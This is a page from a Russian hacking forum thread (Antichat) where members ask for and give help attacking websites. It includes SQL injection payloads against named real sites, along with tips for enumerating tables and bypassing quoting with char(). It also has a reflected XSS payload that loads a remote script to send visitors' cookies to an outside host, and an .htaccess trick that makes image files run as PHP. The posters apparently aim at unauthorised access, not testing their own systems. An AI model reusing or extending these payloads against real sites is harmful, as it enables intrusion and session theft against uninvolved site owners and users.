HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2407 из 2422 « Первая < 14071907230723572397 2403 2404 2405 2406 2407 2408 2409 2410 2411 2417 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.11.2007, 20:06
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию
Цитата:
Сообщение от Jetexe  
Есть Sql Inj в движке и есть Xss в некотором параметре в профиле пользователя. Нужно, внедрить Xss в этот параметр строго у определённого юзера из БД. Есть варианты?
Если это мускул, то нет вариантов, если другой тип БД, то смотря какой тип
𝕏 Twitter Reddit Telegram Копировать ссылку
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #2  
Старый 08.11.2007, 18:14
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию
Цитата:
Сообщение от gemaglabin  
Ок , а если иньекция в order by и вывода нет ? ответит кто? %)
Чет универсального способа немогу придумать, ты хоть намекни, я понимаю, что при таком раскладе нужно составить условие при котром один из вариантов вызывает ошибку, а т.к. сначала происходит проверка синтаксиса то и этот вариант отпадает, еще есть вариант использования into outfile но это настолько специфично (зависит от настроек php и прав пользователя mysql) что я не рассматриваю это как вариант
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #3  
Старый 28.01.2008, 07:39
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами: 10692266

Репутация: 3486


По умолчанию
Цитата:
Сообщение от bobob  
плз, доковыряйте ктото, у мя ума не хватает, а то намучался, так, что аж денвер пришлось устанавливать, чтоб не писать в ручную все колонки, скрипт забацал на вывод цифры и плюсика до 146 штук
а вещь-то думаю ценная, там платный мембершип и тп.

ну эт не главное, меня деньги не интересуют, меня больше процесс, так что главное распишите плз, что делали дальше, если получится

никак не подберу таблички и колонки, а information_schema.tables показывает "CHARACTER_SETS" а какой с него толк
Access Denied
__________________
..
 
Ответить с цитированием

  #4  
Старый 02.02.2008, 21:22
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию
Цитата:
Сообщение от bobob  
вопрос в следующем:

как в схеме +from+information_schema.columns+where+table_name= 'xxx'/*

заменить кавычки вокруг слова xxx ??????

вылетает следующее:


если юзать +from+information_schema.columns+where+table_name= char(39)xxx'/*
то выводит:



первая хавается, а вторая нет.

если +from+information_schema.columns+where+table_name= char(39)xxxchar(39)/*

то:



последний чар сливается со словом....
с хексом ситуация такая же!
если заменить 'xxx' (с кавычками вместе) на чар или хекс, то всё идет гуд, ошибки нету, но просто не выводятся данные, то есть нету тех циферок, которые пробиваются на страничке (надеюсь вы меня поняли) =)

вот что посоветуете сделать, что б всё-таки всё прошло удачно?????
Ты немного не правильно понимаешь процедуру кодировки через char(). В скул-запросе чар используется следующим образом
+from+information_schema.columns+where+table_name= char(ascii,ascii,...,)
например
+from+information_schema.columns+where+table_name= char(116,101,115,116)/*
char(116,101,115,116)=test БЕЗ ковычек.
 
Ответить с цитированием

  #5  
Старый 05.02.2008, 21:13
ONEx
Новичок
Регистрация: 04.02.2008
Сообщений: 4
С нами: 9614495

Репутация: 4
По умолчанию
Пассивный XSS
Цитата:
Сообщение от it's my  
Код:
http://www.poetryclub.com.ua/author.php?id=3873'%22%3E%3C/script%3E'%22%3E%3Cscript%3Ealert(document.coockie)%3C/script%3E
--
не подскажите почему не работает мой скрипт? мой скрипт -
Цитата:
Сообщение от it's my  
Код:
document.location.href="http://www.poetryclub.com.ua/author.php?id=3873'%22%3E%3C/script%3E%27%22%3E%3Cscript%20%73%72%63%3D%68%74%74%70%3A//%78%78%73%2D%78%78%73%2E%6E%6D%2E%72%75%2F%6A%73%2E%6A%73%3E%20%3C/script%3E%0D%0A";
по сути это
Цитата:
Сообщение от it's my  
Код:
document.location.href="http://www.poetryclub.com.ua/author.php?id=3873'"></script>'"><script src=http://xxs-xxs.nm.ru/js.js> </script>";
а в оригенале
Цитата:
Сообщение от it's my  
Код:
http://www.poetryclub.com.ua/author.php?id=3873'"></script>'"><script>alert(document.coockie)</script>>";
xxs-xxs.nm.ru/js.js - там
Цитата:
Сообщение от it's my  
Код:
  <script> img = new Image(); img.src="http://s.netsec.ru/Onex.gif?"+document.cookie;</script>
Помогите плиз разобраться =(
И еще вопрос.. если тырю куки с zzz.ru то и дыра должна быть в zzz.ru ? Спасибо
 
Ответить с цитированием

  #6  
Старый 21.02.2008, 19:54
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами: 9633635

Репутация: 338
Unhappy
Вопрос опять по SQL =)
Вот есть SQL Инекция
Код:
http://www.petrovacnamoru.net/petrovac/kafe-barovi/?id=0x3127%20union+select+1,2,3,4/*
Ну например ввожу я там version() и вместо того чтобы показать версию он мне в ответ вот что:
Цитата:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Что это означает?)
 
Ответить с цитированием

  #7  
Старый 14.03.2008, 05:44
tick
Познающий
Регистрация: 10.11.2007
Сообщений: 36
С нами: 9737661

Репутация: 5
По умолчанию
Нашел на сайте уязвимости:

xss vulnerability : /lol/comment.php?entry=http://www.google.fr/webhp%3f<balisexss>%22%27
bad http code 404 /lol/?page=http://www.google.fr/webhp%3f<balisexss>%22%27&Submit=default

Что посоветуете?
ПОМОГИТЕ пожалуйста!!!
Последний раз редактировалось tick; 14.03.2008 в 15:09..
 
Ответить с цитированием

  #8  
Старый 22.03.2008, 18:32
LolFEm
Участник форума
Регистрация: 08.09.2006
Сообщений: 194
С нами: 10354028

Репутация: 163
По умолчанию
Цитата:
Сообщение от Dimi4  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''phpbb_users''' at line 1
''phpbb_users''' идет экранирование кавычек одиночных... попробуй обойди с помощью char()
 
Ответить с цитированием

  #9  
Старый 22.03.2008, 18:38
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию
Цитата:
Сообщение от LolFEm  
''phpbb_users''' идет экранирование кавычек одиночных... попробуй обойди с помощью char()
ндя, нет там никакого экранирования, посмотри еще раз на ошибку, просто кавычка скриптом добавляется и все, т.е. надо отсекать ее с помощью комментов /*
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #10  
Старый 26.03.2008, 19:06
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию
Цитата:
Сообщение от Ershik  
Если создать файл .htaccess и вписать в него следующую строчку:
AddTypeapplication/x-httpd-php gif - то все файлы с gif будут интрепетироваться как php

addtype application/x-httpd-php gif
 
Ответить с цитированием
Ответ
Страница 2407 из 2422 « Первая < 14071907230723572397 2403 2404 2405 2406 2407 2408 2409 2410 2411 2417 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.